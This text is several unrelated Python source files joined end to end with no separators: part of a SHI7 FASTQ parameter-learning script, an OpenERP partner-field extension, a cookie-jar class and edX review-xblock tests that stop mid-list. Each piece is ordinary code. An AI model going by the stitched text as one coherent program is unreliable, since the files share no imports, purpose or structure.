    """For up to ``num_files`` of ``path_fastqs``, yield a generator over at
    most ``num_sequences`` fastq entries of that file."""
    for i, path_fastq in enumerate(path_fastqs):
        if i >= num_files:
            return
        with open(path_fastq) as fastq_inf:
            fastq_gen = read_fastq(fastq_inf)
            # NOTE(review): the file is closed when the consumer advances this
            # outer generator, so each yielded inner generator must be fully
            # consumed before asking for the next one -- confirm callers do so.
            yield limit_fastq(fastq_gen, num_sequences=num_sequences)


def limit_fastq(fastq_gen, num_sequences=1000):
    """Yield at most ``num_sequences`` entries from ``fastq_gen``."""
    # zip stops at the shorter iterable, so an exhausted source generator
    # simply ends the stream early -- no StopIteration handling needed
    for entry, _ in zip(fastq_gen, range(num_sequences)):
        yield entry


def get_seq_length_qual_scores(path_fastqs, output_path, num_files=10, num_sequences=1000):
    """Write subsampled copies of ``path_fastqs`` into ``output_path`` and
    return ``(average sequence length, average per-base quality value)``.

    Quality is the raw sum of the ASCII codes of the quality string divided
    by the total number of bases.
    """
    subsampled_fastqs = subsample_fastqs(path_fastqs, num_files=num_files, num_sequences=num_sequences)
    sequence_len_sum = 0.
    quality_sum = 0
    # fix: the original reused the ``num_sequences`` parameter as this
    # counter, shadowing the caller's limit and obscuring intent
    total_sequences = 0.

    for fastq_path, fastq_gen in zip(path_fastqs, subsampled_fastqs):
        with open(os.path.join(output_path, os.path.basename(fastq_path)), 'w') as outf:
            for header, sequence, quality in fastq_gen:
                outf.write("@%s\n%s\n+\n%s\n" % (header, sequence, quality))
                sequence_len_sum += len(sequence)
                # generator instead of a throwaway list inside sum()
                quality_sum += sum(ord(i) for i in quality)
                total_sequences += 1.
    # NOTE(review): raises ZeroDivisionError when no sequences were read --
    # confirm callers guarantee non-empty input.
    # Return (average length of sequences, average quality score)
    return sequence_len_sum/total_sequences, quality_sum/sequence_len_sum


def count_num_lines(path):
    """Return the number of lines in the text file at ``path``."""
    count = 0
    with open(path) as path_inf:
        for _ in path_inf:
            count += 1
    return count


def get_file_size(path):
    """Return the size of the file at ``path`` in bytes."""
    # equivalent to os.path.getsize, which is defined as stat().st_size
    return os.stat(path).st_size


def check_sequence_name(path_R1, path_R2):
    """Return True when every pair of headers in the R1/R2 fastq files differs
    in exactly one character, and that character increases by exactly 1
    (e.g. '.../1' vs '.../2'), i.e. the files look like a proper R1/R2 pair."""
    with open(path_R1) as path_inf_R1, open(path_R2) as path_inf_R2:
        fastq_gen_R1 = read_fastq(path_inf_R1)
        fastq_gen_R2 = read_fastq(path_inf_R2)
        for gen_R1, gen_R2 in zip(fastq_gen_R1,fastq_gen_R2):
            # compare only the header lines of each entry
            title_R1, title_R2 = gen_R1[0], gen_R2[0]
            if len(title_R1) != len(title_R2):
                return False
            # positions where the two headers disagree
            diff_idx = [i for i in range(len(title_R1)) if title_R1[i] != title_R2[i]]
            if len(diff_idx) != 1:
                return False
            # the single differing character must be a digit one greater in R2
            if int(title_R2[diff_idx[0]]) - int(title_R1[diff_idx[0]]) != 1:
                return False
    return True


def detect_paired_end(path_fastqs):
    """Guess whether ``path_fastqs`` contains paired-end fastq files.

    Returns ``(is_paired, pair_obj)`` where ``pair_obj`` is the result of
    ``match_pairs`` (or a ``[files, None, None, None]`` placeholder when the
    filtered file count is odd and pairing is impossible).
    """
    # str.endswith accepts a tuple of suffixes: one call instead of four
    path_fastqs = [f for f in path_fastqs
                   if f.endswith(('.fastq', '.fq', '.fastq.gz', '.fq.gz'))]
    # an odd number of files can never be fully paired
    if len(path_fastqs) % 2 == 1:
        return False, [path_fastqs, None, None, None]
    pair_obj = match_pairs(path_fastqs, True)
    path_fastqs = pair_obj[0]
    # fix: was ``pair_obj[1] == None``; identity comparison is the correct idiom
    if pair_obj[1] is None:
        return False, pair_obj
    return True, pair_obj

def get_directory_size(path):
    """Return the total size in bytes of the entries directly inside ``path``."""
    # fix: sum over a generator instead of materializing a throwaway list;
    # os.path.getsize is the same stat().st_size the helper wrapped
    return sum(os.path.getsize(os.path.join(path, name)) for name in os.listdir(path))

def remove_directory_contents(path):
    """Delete every entry directly inside ``path`` (the directory remains)."""
    entries = [os.path.join(path, name) for name in os.listdir(path)]
    for entry in entries:
        os.remove(entry)

def choose_axe_adaptors(path_subsampled_fastqs, paired_end, output_path, threads):
    """Try each known adaptor set on the subsampled fastqs and pick the one
    that shrinks the data the most.

    Returns ``(best_adaptor_or_None, resulting_size, output_files)``; when no
    adaptor removes at least 0.5% of the data, the input files are returned
    unchanged with ``None`` as the adaptor.
    """
    adapters = ['TruSeq2', 'TruSeq3', 'TruSeq3-2', 'Nextera']
    threads = min(threads, multiprocessing.cpu_count(), 16)
    original_size = get_directory_size(os.path.dirname(path_subsampled_fastqs[0]))
    logging.info('Original size of the subsampled_fastqs = ' + str(original_size))
    best_size = original_size
    best_adap = None
    for adapter in adapters:
        if paired_end:
            axe_adaptors_paired_end(path_subsampled_fastqs, output_path, adapter, threads, shell=False)
        else:
            axe_adaptors_single_end(path_subsampled_fastqs, output_path, adapter, threads, shell=False)
        # smaller output means more adaptor sequence was trimmed away
        fastqs_path_size = get_directory_size(output_path)
        logging.info("Adapters: {adapter}\tFile Size: {filesize}".format(adapter=adapter, filesize=fastqs_path_size))
        if fastqs_path_size <= best_size:
            best_size = fastqs_path_size
            best_adap = adapter

    # require at least a 0.5% size reduction before trusting the detection
    if best_size < 0.995*original_size:
        # Actually write the best files again for use in later steps
        logging.info("Best Adapters: {adapter}\tFile Size: {filesize}".format(adapter=best_adap, filesize=best_size))

        if paired_end:
            files = axe_adaptors_paired_end(path_subsampled_fastqs, output_path, best_adap, threads, shell=False)
        else:
            files = axe_adaptors_single_end(path_subsampled_fastqs, output_path, best_adap, threads, shell=False)
        return best_adap, best_size, files
    else:
        return None, original_size, path_subsampled_fastqs


def flash_stitchable_and_check_outies(adapter_output_filenames, flash_output_path, threads):
    """Run FLASH on the adaptor-trimmed files and decide whether the reads
    stitch well and whether "outie" orientations are common.

    Returns ``(stitchable, allow_outies, stitched_fastq_paths)`` where the two
    booleans hold when at least 75% of the files pass the respective check.
    """
    flash_output_str = flash_part1(adapter_output_filenames, flash_output_path, max_overlap=700, \
        min_overlap=10, allow_outies=True, threads=threads, shell=False)

    allow_outies_count = 0
    for flash_out in flash_output_str:
        flash_str_list = flash_out.strip().split('\n')
        # the 8th line from the end of FLASH's report holds the outie stats
        outies_info = flash_str_list[-8]
        # extract the percentage between '(' and '%'
        outies_percent = float(outies_info[outies_info.find('(')+1:outies_info.find('%')])
        if outies_percent >= 15:
            allow_outies_count += 1

    path_flash_fqs = flash_part2(flash_output_str, flash_output_path)
    path_R1_fastqs, _ = split_fwd_rev(adapter_output_filenames)

    # a file "stitched" if the merged output kept >30% of the input reads
    matched_count = 0
    for original_fq, flash_fq in zip(path_R1_fastqs, path_flash_fqs):
        if count_num_lines(flash_fq) > count_num_lines(original_fq)*0.3:
            matched_count = matched_count + 1

    return matched_count/len(path_flash_fqs) >= 0.75, allow_outies_count/len(flash_output_str) >= 0.75, path_flash_fqs


def flash_check_cv(flash_output_path):
    """Parse the FLASH ``.hist`` files in ``flash_output_path`` and return
    ``(mean coefficient of variation, mean fragment length)``, each averaged
    over the histogram files.

    Each ``.hist`` row is tab-separated ``length<TAB>count``.
    """
    hist_files = [os.path.join(flash_output_path, f) for f in os.listdir(flash_output_path) if f.endswith('.hist')]
    total_cv = total_mean = 0
    for f in hist_files:
        with open(f) as inf:
            csv_inf = csv.reader(inf, delimiter="\t")
            x2f = 0         # sum of length^2 * count
            length_sum = 0  # fix: was named ``sum``, shadowing the builtin
            cnt = 0         # total number of fragments
            for row in csv_inf:
                row = [int(r) for r in row]
                cnt = cnt + row[1]
                length_sum = length_sum + row[0] * row[1]
                x2f = x2f + row[0] * row[0] * row[1]
            mean = length_sum/cnt
            # sample standard deviation from the accumulated moments
            std = math.sqrt((x2f - length_sum*length_sum/cnt)/(cnt-1))
            cv = std/mean
            total_cv = total_cv + cv
            total_mean = total_mean + mean
    total_files = len(hist_files)
    return total_cv/total_files, total_mean/total_files


def trimmer_learning(flash_output_filenames):
    """Derive quality-filter and quality-trim thresholds from the stitched
    fastq files.

    ``filter_q`` is the mean quality over all bases; ``trim_q`` is derived
    from the mean quality of the 10 leading + 10 trailing bases of reads of
    length >= 20, floored to at least ``filter_q - 3``.
    """
    filter_q_sum = 0   # sum of all base qualities
    trim_q_sum = 0     # sum of qualities over the read edges only
    totbases = 0
    tottrim = 0
    num = 0
    for fq_path in flash_output_filenames:
        with open(fq_path) as fq_inf:
            fq_gen = read_fastq(fq_inf)
            for gen in fq_gen:
                num = num + 1
                qualities = gen[2]
                totbases = totbases + len(qualities)
                # convert Phred+33 characters to numeric scores
                qualities = [ord(qual)-33 for qual in qualities]
                filter_q_sum = filter_q_sum + sum(qualities)
                if (len(qualities) >= 20):
                    # sample the first and last 10 bases of the read
                    trim_q_sum = trim_q_sum + sum(qualities[:10]) + sum(qualities[-10:])
                    tottrim = tottrim + 20
    logging.info('num seqs: %d' % num)
    logging.info('filter_q_sum: %d' % filter_q_sum)
    logging.info('trim_q_sum: %d' % trim_q_sum)
    logging.info('total bases considered: %d (trim: %d)' % (totbases, tottrim))
    # NOTE(review): divides by totbases/tottrim -- raises ZeroDivisionError
    # when the inputs are empty or every read is shorter than 20 bases;
    # confirm callers guarantee otherwise.
    logging.info('filter_q: %d' % (filter_q_sum/totbases))
    logging.info('trim_q: %d' % (trim_q_sum/tottrim))

    filter_q = math.floor(filter_q_sum/totbases)
    trim_q = math.floor(trim_q_sum/tottrim)-1
    # never trim more aggressively than 3 below the filter threshold
    trim_q = trim_q if trim_q > filter_q - 3 else filter_q - 3

    return filter_q, trim_q

def template_input(input):
    """Return the learning-log line and CLI flags for the input path."""
    # note: parameter name shadows the builtin ``input`` (kept for API compat)
    abspath = os.path.abspath(input)
    # input, input_cmd
    return "input\t{}".format(abspath), ["--input", abspath]

def template_paired_end(bool):
    """Return the learning-log line and CLI flags for paired-end detection."""
    # note: parameter name shadows the builtin ``bool`` (kept for API compat)
    line = "paired_end\t{}".format(str(bool))
    # paired-end needs no extra flag; single-end adds -SE
    return (line, None) if bool else (line, ["-SE"])

def template_trim(filt_q, trim_q):
    """Return the learning-log line and CLI flags for quality trimming."""
    line = "filt_q: %d, trim_q: %d" % (filt_q, trim_q)
    flags = ["--filter_qual", str(filt_q), "--trim_qual", str(trim_q)]
    return line, flags

def template_cv(minstitch, maxstitch):
    """Return the learning-log line and CLI flags for the stitch overlap range."""
    line = "minstitch: %d, maxstitch: %d" % (minstitch, maxstitch)
    flags = ["--min_overlap", str(minstitch), "--max_overlap", str(maxstitch)]
    return line, flags

def template_output(output):
    """Return the learning-log line and CLI flags for the output path."""
    abspath = os.path.abspath(output)
    # output, output_cmd
    return "output\t{}".format(abspath), ["--output", abspath]

def template_choose_axe_adaptors(best_adapt, best_size):
    """Return the learning-log line and CLI flags for adaptor trimming.

    ``best_size`` is accepted for signature compatibility but unused.
    """
    # fix: the body used 3-space indentation, inconsistent with the file
    if best_adapt:
        return "axe_adaptors\t" + best_adapt, ["--adaptor", best_adapt]
    else:
        return "axe_adaptors\tNA", ["--adaptor", "None"]

def template_flash(stitches, do_outies):
    """Return the learning-log line and CLI flags for FLASH stitching."""
    flags = ["--flash", str(stitches), "--allow_outies", str(do_outies)]
    return "stitches: %s, outies: %s" % (stitches, do_outies), flags

def main():
    """Learn SHI7 preprocessing parameters from the FASTQs in the input
    folder and write two artifacts to the output folder: shi7_cmd.sh
    (the assembled shi7.py command line) and learning_params.txt
    (a human-readable label/value report).
    """
    start_time = datetime.now()

    parser = make_arg_parser()
    args = parser.parse_args()

    # learning_params accumulates the shi7.py argv being built;
    # learning_pretty accumulates alternating label/value pairs
    # that are written out two-at-a-time at the end.
    learning_params = ["shi7.py"]
    learning_pretty = ["SHI7 version", __version__]

    input = os.path.abspath(args.input)
    output = os.path.abspath(args.output)

    # Make output folder
    if not os.path.exists(output):
        os.makedirs(output)

    # Put in the logging file
    logging.basicConfig(filename=os.path.join(output, 'shi7_learning.log'), filemode='w', level=logging.DEBUG, \
        format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')

    # Make temp outfolder (recreated fresh on every run)
    if os.path.exists(os.path.join(args.output, 'temp')):
        shutil.rmtree(os.path.join(args.output, 'temp'))
        logging.info('Existing temp directory deleted.')
        os.makedirs(os.path.join(args.output, 'temp'))
    else:
        os.makedirs(os.path.join(args.output, 'temp'))


    path_fastqs = [os.path.join(input, f) for f in os.listdir(input) if f.endswith('fastq') or f.endswith('fq') or f.endswith('fq.gz') or f.endswith('fastq.gz')]

    if len(path_fastqs) == 0:
        msg = "No FASTQS found in input folder {}".format(input)
        logging.critical(msg)
        raise IOError(msg)

    # Record the input
    results, addon = template_input(input)
    logging.info(results)
    if addon:
        learning_params.extend(addon)

    # Write temp subsampled fastqs
    subsampled_fastq_path = os.path.join(output, 'temp', 'subsampled')
    os.makedirs(subsampled_fastq_path)
    totbases = totseqs = 0
    for file in path_fastqs:
        basename = os.path.basename(file)
        # Open plain-text FASTQs directly; anything else is assumed gzipped.
        if(file.endswith('.fastq') or file.endswith('.fq')):
            fastq_inf = open(file)
        else:
            fastq_inf = gzip.open(file, 'rt')
        fastq_gen = read_fastq(fastq_inf)
        if(basename.endswith('.gz')):
            basename = basename[:-3]
        with open(os.path.join(subsampled_fastq_path, basename), 'w') as outf:
            # limit_fastq presumably caps the number of records taken
            # per file — TODO confirm against its definition.
            for header, seq, quality in limit_fastq(fastq_gen):
                outf.write("@{header}\n{seq}\n+\n{quality}\n".format(header=header, seq=seq, quality=quality))
                totbases += len(seq)
                totseqs += 1
    avlen = totbases/totseqs  # mean read length of the subsample
    path_fastqs = glob(os.path.join(subsampled_fastq_path , "*"))



    # Detect if paired end
    paired_end, pair_obj = detect_paired_end(path_fastqs)
    path_fastqs = pair_obj[0]
    link_outdir = os.path.join(output, 'temp', 'link')
    os.makedirs(link_outdir)
    snames = [os.path.basename(n) for n in path_fastqs]
    path_fastqs = link_manicured_names(path_fastqs, snames, link_outdir, not paired_end, pair_obj[1:])

    results, addon = template_paired_end(paired_end)
    logging.info(results)
    if addon: learning_params.extend(addon)
    learning_pretty += ["Paired end",paired_end]

    # Detect adapters
    axe_adaptors_path = os.path.join(output, 'temp', 'axe_adaptors')
    os.makedirs(axe_adaptors_path)
    best_adap, best_size, fastq_paths = choose_axe_adaptors(path_fastqs, paired_end, axe_adaptors_path, int(args.threads))
    results, addon = template_choose_axe_adaptors(best_adap, best_size)
    logging.info(results)
    if addon: learning_params.extend(addon)
    learning_pretty += ["Detected adaptors",best_adap]

    # Detect output folder
    results, addon = template_output(output)
    logging.info(results)
    if addon: learning_params.extend(addon)

    # Detect stitching (only meaningful for paired-end data)
    stitched_path = os.path.join(output, 'temp', 'flash')
    os.makedirs(stitched_path)
    if paired_end:
        stitches, do_outies, fastq_paths = flash_stitchable_and_check_outies(fastq_paths, stitched_path, int(args.threads))
    else: stitches, do_outies = False, False
    results, addon = template_flash(stitches, do_outies)
    logging.info(results)
    if addon: learning_params.extend(addon)
    if paired_end:
        learning_pretty += ["Stitching",stitches]
        if stitches: learning_pretty += ["Outies allowed",do_outies]

    # Learn filter/trim quality thresholds from the (possibly stitched) reads
    filt_q, trim_q = trimmer_learning(fastq_paths)
    results, addon = template_trim(int(filt_q), int(trim_q))
    logging.info(results)
    if addon: learning_params.extend(addon)
    learning_pretty += ["Filter quality",filt_q,"Trimming quality",trim_q]

    # Check whether to implement stitching bounds
    # Low coefficient of variation in stitched lengths suggests amplicon
    # data, so derive explicit min/max overlap bounds for FLASH.
    if stitches:
        cv, mean = flash_check_cv(stitched_path)
        if cv < 0.1:
            learning_pretty += ["Amplicon mode",True]
            logging.info("CV: %f, Mean: %f, Avlen: %f" % (cv, mean, avlen))
            if avlen > mean: avlen = mean
            mr = math.ceil(cv*mean)
            logging.info("SD was: %d" % mr)
            minstitch, maxstitch = int(2*avlen - mean-mr), int(2*avlen - mean+mr)
            if minstitch < 8: minstitch = 8
            logging.info("Amplicon mode: stitch range [%d, %d]" % (minstitch, maxstitch))
            results, addon = template_cv(minstitch, maxstitch)
            logging.info(results)
            if addon: learning_params.extend(addon)
            learning_pretty += ["Amplicon stitch minimum",minstitch]
            learning_pretty += ["Amplicon stitch maximum",maxstitch]
        else: learning_pretty += ["Amplicon mode",False]

    #print(str(learning_params))
    # NOTE(review): 'output' is rebound here from the output-path string to
    # a file handle; the path is not needed after this point, but the
    # shadowing is fragile if code is ever added below.
    with open(os.path.join(args.output, "shi7_cmd.sh"), "w") as output:
        cmd = " ".join(learning_params)
        output.write(cmd)
        print(cmd)

    # learning_pretty holds alternating label/value pairs; write one
    # tab-separated pair per line.
    with open(os.path.join(args.output, "learning_params.txt"),"w") as output:
        for ix in range(0,len(learning_pretty),2):
            output.write(str(learning_pretty[ix]) + "\t" + str(learning_pretty[ix+1]) + "\n")

    # Keep intermediate files only when debugging
    if not args.debug:
        shutil.rmtree(os.path.join(args.output, 'temp'))
    logging.info('Execution time: %s' % (datetime.now() - start_time))

# Script entry point.
if __name__ == "__main__":
    main()

# -*- coding: utf-8 -*-
##############################################################################
#
# Author: OpenDrive Ltda
# Copyright (c) 2013 Opendrive Ltda
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsibility of assessing all potential
# consequences resulting from its eventual inadequacies and bugs.
# End users who are looking for a ready-to-use solution with commercial
# guarantees and support are strongly advised to contract a Free Software
# Service Company.
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
#
##############################################################################

from openerp.osv import osv, fields
from openerp.tools.translate import _


class Partner(osv.osv):
    """Extend res.partner with a legal-representative field."""
    _inherit = 'res.partner'

    _columns = {
        'legal_representative': fields.char('Legal Representative'),
    }


	
# -*- coding: utf-8 -*-

import time
from datetime import timedelta


class CookieJar:
    """In-memory cookie store for one plugin/account pair.

    Cookies are stored as Netscape-style tab-separated records:
    ``domain \\t flag \\t path \\t secure \\t expiry \\t name \\t value``
    so the name is field index 5 and the value is field index 6.
    """

    def __init__(self, pluginname, account=None):
        self.cookies = {}          # cookie name -> raw tab-separated record
        self.plugin = pluginname   # owning plugin name
        self.account = account     # optional account identifier

    def add_cookies(self, clist):
        """Add raw cookie records, keyed by their name field (index 5)."""
        for c in clist:
            name = c.split("\t")[5]
            self.cookies[name] = c

    def get_cookies(self):
        """Return all stored raw cookie records."""
        return list(self.cookies.values())

    def parse_cookie(self, name):
        """Return the value (field 6) of cookie *name*, or None if absent."""
        if name in self.cookies:
            return self.cookies[name].split("\t")[6]
        else:
            return None

    def get_cookie(self, name):
        """Alias for :meth:`parse_cookie`."""
        return self.parse_cookie(name)

    def set_cookie(
        self,
        domain,
        name,
        value,
        path="/",
        exp=None,
    ):
        """Store a cookie record for *name*.

        Bug fix: the expiry default was previously computed in the
        signature (``exp=time.time() + ...``), i.e. once at import time,
        so every cookie set without an explicit *exp* shared the same
        stale timestamp.  It is now computed at call time: 744 hours
        (31 days) from now.
        """
        if exp is None:
            exp = time.time() + timedelta(hours=744).total_seconds()  #: 31 days retention
        self.cookies[
            name
        ] = f".{domain}\tTRUE\t{path}\tFALSE\t{exp}\t{name}\t{value}"

    def clear(self):
        """Discard all stored cookies."""
        self.cookies = {}

"""
Test scenarios for the review xblock.
"""
import ddt
import unittest

from django.conf import settings
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from nose.plugins.attrib import attr

from lms.djangoapps.courseware.tests.factories import GlobalStaffFactory
from lms.djangoapps.courseware.tests.helpers import LoginEnrollmentTestCase
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory

from review import get_review_ids
import crum


class TestReviewXBlock(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
    """
    Create the test environment with the review xblock.
    """
    # Learner accounts created and activated in setUp().
    STUDENTS = [
        {'email': 'learner@test.com', 'password': 'foo'},
    ]
    XBLOCK_NAMES = ['review']
    # Prefix of every review-problem URL the xblock is expected to emit;
    # points into the review course defined in setUpClass().
    URL_BEGINNING = settings.LMS_ROOT_URL + \
        '/xblock/block-v1:DillonX/DAD101x_review/3T2017+type@'

    @classmethod
    def setUpClass(cls):
        """Build an 'actual' course and a parallel 'review' course with
        matching problems (Problem 1-6 across three sections/units)."""
        # Nose runs setUpClass methods even if a class decorator says to skip
        # the class: https://github.com/nose-devs/nose/issues/946
        # So, skip the test class here if we are not in the LMS.
        if settings.ROOT_URLCONF != 'lms.urls':
            raise unittest.SkipTest('Test only valid in lms')

        super(TestReviewXBlock, cls).setUpClass()

        # Set up for the actual course
        cls.course_actual = CourseFactory.create(
            display_name='Review_Test_Course_ACTUAL',
            org='DillonX',
            number='DAD101x',
            run='3T2017'
        )
        # There are multiple sections so the learner can load different
        # problems, but should only be shown review problems from what they have loaded
        with cls.store.bulk_operations(cls.course_actual.id, emit_signals=False):
            cls.chapter_actual = ItemFactory.create(
                parent=cls.course_actual, display_name='Overview'
            )
            # Section 1 holds Problems 1-4 in a single unit.
            cls.section1_actual = ItemFactory.create(
                parent=cls.chapter_actual, display_name='Section 1'
            )
            cls.unit1_actual = ItemFactory.create(
                parent=cls.section1_actual, display_name='New Unit 1'
            )
            cls.xblock1_actual = ItemFactory.create(
                parent=cls.unit1_actual,
                category='problem',
                display_name='Problem 1'
            )
            cls.xblock2_actual = ItemFactory.create(
                parent=cls.unit1_actual,
                category='problem',
                display_name='Problem 2'
            )
            cls.xblock3_actual = ItemFactory.create(
                parent=cls.unit1_actual,
                category='problem',
                display_name='Problem 3'
            )
            cls.xblock4_actual = ItemFactory.create(
                parent=cls.unit1_actual,
                category='problem',
                display_name='Problem 4'
            )
            # Section 2 holds Problem 5.
            cls.section2_actual = ItemFactory.create(
                parent=cls.chapter_actual, display_name='Section 2'
            )
            cls.unit2_actual = ItemFactory.create(
                parent=cls.section2_actual, display_name='New Unit 2'
            )
            cls.xblock5_actual = ItemFactory.create(
                parent=cls.unit2_actual,
                category='problem',
                display_name='Problem 5'
            )
            # Section 3 holds Problem 6.
            cls.section3_actual = ItemFactory.create(
                parent=cls.chapter_actual, display_name='Section 3'
            )
            cls.unit3_actual = ItemFactory.create(
                parent=cls.section3_actual, display_name='New Unit 3'
            )
            cls.xblock6_actual = ItemFactory.create(
                parent=cls.unit3_actual,
                category='problem',
                display_name='Problem 6'
            )

        cls.course_actual_url = reverse(
            'courseware_section',
            kwargs={
                'course_id': unicode(cls.course_actual.id),
                'chapter': 'Overview',
                'section': 'Welcome',
            }
        )

        # Set up for the review course where the review problems are hosted
        cls.course_review = CourseFactory.create(
            display_name='Review_Test_Course_REVIEW',
            org='DillonX',
            number='DAD101x_review',
            run='3T2017'
        )
        # Mirrors the actual course's problems 1-6 in a single section.
        with cls.store.bulk_operations(cls.course_review.id, emit_signals=True):
            cls.chapter_review = ItemFactory.create(
                parent=cls.course_review, display_name='Overview'
            )
            cls.section_review = ItemFactory.create(
                parent=cls.chapter_review, display_name='Welcome'
            )
            cls.unit1_review = ItemFactory.create(
                parent=cls.section_review, display_name='New Unit 1'
            )
            cls.xblock1_review = ItemFactory.create(
                parent=cls.unit1_review,
                category='problem',
                display_name='Problem 1'
            )
            cls.xblock2_review = ItemFactory.create(
                parent=cls.unit1_review,
                category='problem',
                display_name='Problem 2'
            )
            cls.xblock3_review = ItemFactory.create(
                parent=cls.unit1_review,
                category='problem',
                display_name='Problem 3'
            )
            cls.xblock4_review = ItemFactory.create(
                parent=cls.unit1_review,
                category='problem',
                display_name='Problem 4'
            )
            cls.unit2_review = ItemFactory.create(
                parent=cls.section_review, display_name='New Unit 2'
            )
            cls.xblock5_review = ItemFactory.create(
                parent=cls.unit2_review,
                category='problem',
                display_name='Problem 5'
            )
            cls.unit3_review = ItemFactory.create(
                parent=cls.section_review, display_name='New Unit 3'
            )
            cls.xblock6_review = ItemFactory.create(
                parent=cls.unit3_review,
                category='problem',
                display_name='Problem 6'
            )

        cls.course_review_url = reverse(
            'courseware_section',
            kwargs={
                'course_id': unicode(cls.course_review.id),
                'chapter': 'Overview',
                'section': 'Welcome',
            }
        )

    def setUp(self):
        """Create and activate one account per STUDENTS entry, plus a
        global staff user."""
        super(TestReviewXBlock, self).setUp()

        for idx, student in enumerate(self.STUDENTS):
            username = 'u{}'.format(idx)
            self.create_account(username, student['email'], student['password'])
            self.activate_user(student['email'])

        self.staff_user = GlobalStaffFactory()

    def enroll_student(self, email, password, course):
        """
        Student login and enroll for the course
        """
        self.login(email, password)
        self.enroll(course, verify=True)


@attr(shard=1)
@ddt.ddt
class TestReviewFunctions(TestReviewXBlock):
    """
    Check that the essential functions of the Review xBlock work as expected.
    Tests cover the basic process of receiving a hint, adding a new hint,
    and rating/reporting hints.
    """
    def test_no_review_problems(self):
        """
        If a user has not seen any problems, they should
        receive a response to go out and try more problems so they have
        material to review.
        """
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_actual)
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_review)

        # Add a review section to the actual course without loading any
        # problems first.
        with self.store.bulk_operations(self.course_actual.id, emit_signals=False):
            review_section_actual = ItemFactory.create(
                parent=self.chapter_actual, display_name='Review Subsection'
            )
            review_unit_actual = ItemFactory.create(
                parent=review_section_actual, display_name='Review Unit'
            )

            review_xblock_actual = ItemFactory.create(  # pylint: disable=unused-variable
                parent=review_unit_actual,
                category='review',
                display_name='Review Tool'
            )

        # Loading the review section
        response = self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': review_section_actual.location.name,
            }
        ))

        expected_h2 = 'Nothing to review'
        self.assertIn(expected_h2, response.content)

    @ddt.data(5, 7)
    def test_too_few_review_problems(self, num_desired):
        """
        If a user does not have enough problems to review, they should
        receive a response to go out and try more problems so they have
        material to review.

        Testing loading 4 problems and asking for 5 and then loading every
        problem and asking for more than that.
        """
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_actual)
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_review)

        # Want to load fewer problems than num_desired
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section1_actual.location.name,
            }
        ))
        # For the larger num_desired, load every section (6 problems total)
        # and still ask for more than that.
        if num_desired > 6:
            self.client.get(reverse(
                'courseware_section',
                kwargs={
                    'course_id': self.course_actual.id,
                    'chapter': self.chapter_actual.location.name,
                    'section': self.section2_actual.location.name,
                }
            ))
            self.client.get(reverse(
                'courseware_section',
                kwargs={
                    'course_id': self.course_actual.id,
                    'chapter': self.chapter_actual.location.name,
                    'section': self.section3_actual.location.name,
                }
            ))

        with self.store.bulk_operations(self.course_actual.id, emit_signals=False):
            review_section_actual = ItemFactory.create(
                parent=self.chapter_actual, display_name='Review Subsection'
            )
            review_unit_actual = ItemFactory.create(
                parent=review_section_actual, display_name='Review Unit'
            )

            review_xblock_actual = ItemFactory.create(  # pylint: disable=unused-variable
                parent=review_unit_actual,
                category='review',
                display_name='Review Tool',
                num_desired=num_desired
            )

        # Loading the review section
        response = self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': review_section_actual.location.name,
            }
        ))

        expected_h2 = 'Nothing to review'

        self.assertIn(expected_h2, response.content)

    @ddt.data(2, 6)
    def test_review_problems(self, num_desired):
        """
        If a user has enough problems to review, they should
        receive a response where there are review problems for them to try.
        """
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_actual)
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_review)

        # Loading problems so the learner has enough problems in the CSM
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section1_actual.location.name,
            }
        ))
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section2_actual.location.name,
            }
        ))
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section3_actual.location.name,
            }
        ))

        with self.store.bulk_operations(self.course_actual.id, emit_signals=False):
            review_section_actual = ItemFactory.create(
                parent=self.chapter_actual, display_name='Review Subsection'
            )
            review_unit_actual = ItemFactory.create(
                parent=review_section_actual, display_name='Review Unit'
            )

            review_xblock_actual = ItemFactory.create(  # pylint: disable=unused-variable
                parent=review_unit_actual,
                category='review',
                display_name='Review Tool',
                num_desired=num_desired
            )

        # Loading the review section
        response = self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': review_section_actual.location.name,
            }
        ))

        expected_header_text = 'Review Problems'
        # The problems are defaulted to correct upon load
        # This happens because the problems "raw_possible" field is 0 and the
        # "raw_earned" field is also 0.
        expected_correctness_text = 'correct'
        expected_problems = ['Review Problem 1', 'Review Problem 2', 'Review Problem 3',
